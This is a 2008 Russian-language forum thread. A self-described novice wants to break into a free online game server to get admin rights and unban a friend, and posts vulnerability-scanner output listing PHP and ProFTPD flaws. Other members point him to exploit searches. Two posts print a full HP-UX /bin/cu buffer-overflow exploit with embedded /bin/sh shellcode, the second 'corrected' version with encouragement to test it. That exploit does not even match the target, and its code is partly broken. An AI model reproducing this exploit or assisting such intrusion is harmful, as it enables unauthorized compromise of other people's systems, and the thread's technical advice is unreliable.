как воспользоваться найденной уязвимостью
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
как воспользоваться найденной уязвимостью - 2008-12-22 12:15:35.280000
|
|
|
Amony
Сообщений: 18
Оценки: 0
Присоединился: 2007-04-27 12:00:56.890000
|
Всем привет, я играю в онлайн игру на халявном серве, моего кента там перепутали с другим и забанили решить вопрос с админом нереально, т.к. заходит он редко и стоны типа "не виноватая я" не слушает. Я решил ломануть сервачек, заручиться админскими правами, разбанить кента… и все будут счастливы. Проблема в том, что я лааамер. Вобщем протестил серв Shadow Security сканером, он выдал следующие уязвимости: 1 PHP is prone to a 'safe_mode' and 'open_basedir' restriction-bypass vulnerability. Successful exploits could allow an attacker to access sensitive information or to write files in unauthorized locations.This vulnerability would be an issue in shared-hosting configurations where multiple users can create and execute arbitrary PHP sсriрt code; in such cases, the 'safe_mode' and 'open_basedir' restrictions are expected to isolate users from each other.PHP version 5.2.0 is vulnerable to this issue. 2 ProFTPD is prone to a local stack buffer-overflow vulnerability.Attackers may exploit this issue to corrupt memory and execute arbitrary code in the context of the server application, resulting in a complete compromise of affected computers.ProFTPD is only vulnerable when compiled with 'mod_ctrls' support and the module is enabled. 3 ProFTPD is prone to a remote buffer-overflow vulnerability.Exploiting this issue allows remote attackers to cause a buffer overflow, to corrupt memory, and to execute arbitrary machine code in the context of the server application, facilitating the compromise of affected computers.ProFTPD 1.3.0a and prior versions are vulnerable to this issue. 4 ProFTPD is prone to a remote buffer-overflow vulnerability.Exploiting this issue allows remote attackers to cause a buffer overflow, to corrupt memory, and to execute arbitrary machine code in the context of the server application, facilitating the compromise of affected computers.ProFTPD 1.3.0a and prior versions are vulnerable to this issue. Могу ли я со своими 0,001 способностями воспользоваться? И если да,то как? (Если вопрос по вашему мнению действительно тупой, скажите … без обид закроем тему8|)
|
|
|
RE: как воспользоваться найденной уязвимостью - 2008-12-22 13:04:16.796666
|
|
|
13thApostol
Сообщений: 134
Оценки: 0
Присоединился: 2008-11-03 23:41:57.986666
|
Ну если не обидешся))))):D ТЕМУ ЗАКРЫТЬ АВТОРА В БАН!!!!!!!!:@
|
|
|
RE: как воспользоваться найденной уязвимостью - 2008-12-22 13:11:20.593333
|
|
|
Cep}|{
Сообщений: 1396
Оценки: 0
Присоединился: 2007-06-26 01:11:51.416666
|
quote:
ORIGINAL: 13thApostol Ну если не обидешся))))):D ТЕМУ ЗАКРЫТЬ АВТОРА В БАН!!!!!!!!:@ C какого …..
|
|
|
RE: как воспользоваться найденной уязвимостью - 2008-12-22 13:16:56.670000
|
|
|
13thApostol
Сообщений: 134
Оценки: 0
Присоединился: 2008-11-03 23:41:57.986666
|
та прикол)[:(]
|
|
|
RE: как воспользоваться найденной уязвимостью - 2008-12-22 13:23:21.360000
|
|
|
Cep}|{
Сообщений: 1396
Оценки: 0
Присоединился: 2007-06-26 01:11:51.416666
|
quote:
ORIGINAL: 13thApostol та прикол)[:(] ну тада другой базар…
|
|
|
RE: как воспользоваться найденной уязвимостью - 2008-12-22 14:58:26.830000
|
|
|
Amony
Сообщений: 18
Оценки: 0
Присоединился: 2007-04-27 12:00:56.890000
|
Прикол принят:D жду рекомендаций, или на худой конец еще приколов[&:]
|
|
|
RE: как воспользоваться найденной уязвимостью - 2008-12-22 15:08:20.406666
|
|
|
Amony
Сообщений: 18
Оценки: 0
Присоединился: 2007-04-27 12:00:56.890000
|
Щас разбираю Уроки от Xakep9009, но я так понял времени это займет немало, а пацану играть хочется и аккаунта жалко - качал долго и с душой.
|
|
|
RE: как воспользоваться найденной уязвимостью - 2008-12-22 15:47:16.500000
|
|
|
Denisska05
Сообщений: 661
Оценки: 0
Присоединился: 2007-06-26 20:21:10.883333
|
Так пробовал ? _http://www.google.ru/search?hl=ru&newwindow=1&q=ProFTPD+exploit&lr=&aq=f&oq=
|
|
|
RE: как воспользоваться найденной уязвимостью - 2008-12-23 01:20:44.260000
|
|
|
Amony
Сообщений: 18
Оценки: 0
Присоединился: 2007-04-27 12:00:56.890000
|
Ооо,что то существенное :). Спасибо. Вобщем по твоей ссылке нашел я експлойт для уязвимости в ProFTPD, и … понял, что моих 0,0001 знаний наверное не хватит, т.к. что делать с кодом этого експлойта я не бум бум [:o]. Дааа и такие ламеры бывают:@. Или может у меня еще не все потеряно?[:-]
|
|
|
RE: как воспользоваться найденной уязвимостью - 2008-12-23 01:23:05.743333
|
|
|
Denisska05
Сообщений: 661
Оценки: 0
Присоединился: 2007-06-26 20:21:10.883333
|
Подозреваю что если код исходный то его нужно компелировать… если интерпретируемый то интерпретировать…
|
|
|
RE: как воспользоваться найденной уязвимостью - 2008-12-23 01:25:35.760000
|
|
|
Amony
Сообщений: 18
Оценки: 0
Присоединился: 2007-04-27 12:00:56.890000
|
Да, чуть не забыл, Denisska05, кроме спасибо тебе + в репу, мож оно и не важно, но хоцца отблагодарить за содействие:).
|
|
|
RE: как воспользоваться найденной уязвимостью - 2008-12-23 01:41:57.836666
|
|
|
Amony
Сообщений: 18
Оценки: 0
Присоединился: 2007-04-27 12:00:56.890000
|
/* Copyright © 2001 Zorgon * All Rights Reserved * The copyright notice above does not evidence any * actual or intended publication of such source code. * * HP-UX /bin/cu exploit. * Tested on HP-UX 11.00 * zorgon@antionline.org (http://www.nightbird.free.fr) * */ #include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <unistd.h> #define LEN 9778 #define HPPA_NOP 0x0b390280 #define RET 0x7f7eb010 #define OFFSET 1200 /* it works for me */ u_char hppa_shellcode[] = /* K2 <ktwo@ktwo.ca> shellcode */ "\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02\x60\x40" "\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02\x98\x34\x16\x04\xbe" "\x20\x20\x08\x01\xe4\x20\xe0\x08\x96\xd6\x05\x34\xde\xad\xca\xfe/bin/sh\xff"; int main(int argc , char **argv){ char buffer[LEN+8]; int i; long retaddr = RET; int offset = OFFSET; if(argc>1) offset = atoi(argv[1]); for (i=0;i<LEN;i+=4) *(long *)&buffer = retaddr + offset; for (i=0;i<(LEN-strlen(hppa_shellcode)-50);i++) *(buffer+i) = HPPA_NOP; memcpy(buffer+i,hppa_shellcode,strlen(hppa_shellcode)); fprintf(stderr, "HP-UX 11.00 /bin/cu exploit\n"); fprintf(stderr, "Copyright © 2001 Zorgon\n"); fprintf(stderr, "[return address = %x] [offset = %d] [buffer size = %d]\n", retaddr + offset, offset, strlen(buffer)); execl("/bin/cu","cu","-l",buffer,0);
|
|
|
RE: как воспользоваться найденной уязвимостью - 2008-12-23 01:43:38.430000
|
|
|
Amony
Сообщений: 18
Оценки: 0
Присоединился: 2007-04-27 12:00:56.890000
|
Я так понимаю это исходник, который нужно компилировать. Правильно?
|
|
|
RE: как воспользоваться найденной уязвимостью - 2008-12-23 01:52:27.510000
|
|
|
Amony
Сообщений: 18
Оценки: 0
Присоединился: 2007-04-27 12:00:56.890000
|
Меня терзают смутные сомнения. Помоему это не с++. Да?
|
|
|
RE: как воспользоваться найденной уязвимостью - 2008-12-23 02:32:50.913333
|
|
|
Mamka
Сообщений: 560
Оценки: 0
Присоединился: 2007-11-26 22:20:09.313333
|
quote:
ORIGINAL: Amony Меня терзают смутные сомнения. Помоему это не с++. Да? Это ты почему так решил?
|
|
|
RE: как воспользоваться найденной уязвимостью - 2008-12-23 02:59:54.243333
|
|
|
KentOne
Сообщений: 178
Оценки: 0
Присоединился: 2008-07-15 16:30:46.030000
|
Судя по библиотекам С++
|
|
|
RE: как воспользоваться найденной уязвимостью - 2008-12-23 17:31:45.650000
|
|
|
v0l0d1ka
Сообщений: 36
Оценки: 0
Присоединился: 2008-12-22 00:24:04.290000
|
Языки программирования учить надо!
|
|
|
RE: как воспользоваться найденной уязвимостью - 2008-12-24 00:56:27.150000
|
|
|
Amony
Сообщений: 18
Оценки: 0
Присоединился: 2007-04-27 12:00:56.890000
|
Та надо, полностью согласен. Но я тока начал учить, дошел до областей видимости. Может я конечно тугодум, но блин без консультанта, чисто по книгам сложно как то учится. По виду и мне показалось что с++, а в компилятор впихнул - он материться начал, вот я и засомневался. Я просто кроме с++, только бейсик в школе учил (до массивов дошел). Вот и подумал, что может другой какой то язык по терминам похожий на с++. Дааа, ну я ламер.(нет наверное ламер - это круто для меня).
|
|
|
RE: как воспользоваться найденной уязвимостью - 2008-12-24 01:06:19.600000
|
|
|
Denisska05
Сообщений: 661
Оценки: 0
Присоединился: 2007-06-26 20:21:10.883333
|
Скорее всего это С++ но это явно не полный код проги…
|
|
|
RE: как воспользоваться найденной уязвимостью - 2008-12-24 14:32:34.536666
|
|
|
Amony
Сообщений: 18
Оценки: 0
Присоединился: 2007-04-27 12:00:56.890000
|
Оооо, будем кумекать, спасибо.
|
|
|
RE: как воспользоваться найденной уязвимостью - 2008-12-27 20:21:20.016666
|
|
|
v0l0d1ka
Сообщений: 36
Оценки: 0
Присоединился: 2008-12-22 00:24:04.290000
|
Вот тебе исправленный текст: #include <stdio.h> #include <string.h> #include <stdlib.h> #include <sys/types.h> #include <unistd.h> #define LEN 9778 #define HPPA_NOP 0x0b390280 #define RET 0x7f7eb010 #define OFFSET 1200 /* it works for me */ char hppa_shellcode[] = /* K2 <ktwo@ktwo.ca> shellcode */ "\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02\x60\x40" "\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02\x98\x34\x16\x04\xbe" "\x20\x20\x08\x01\xe4\x20\xe0\x08\x96\xd6\x05\x34\xde\xad\xca\xfe/bin/sh\xff"; int main(int argc , char **argv){ char buffer[LEN+8]; int i; long retaddr = RET; int offset = OFFSET; if(argc>1) offset = atoi(argv[1]); for (i=0;i<LEN;i+=4) *(long *)&buffer = retaddr + offset; for (i=0;i<(LEN- strlen(hppa_shellcode)-50);i++) *(buffer+i) = HPPA_NOP; memcpy(buffer+i,hppa_shellcode,strlen(hppa_shellcode)); fprintf(stderr, "HP-UX 11.00 /bin/cu exploit\n"); fprintf(stderr, "Copyright © 2001 Zorgon\n"); fprintf(stderr, "[return address = %x] [offset = %d] [buffer size = %d]\n", retaddr + offset, offset, strlen(buffer)); execl("/bin/cu","cu","-l",buffer,0); } У меня все компилируется с помощью компилятора Dev-C++. Exe-шник проверяй на практике. Желаю удачи
|
|
|
|
|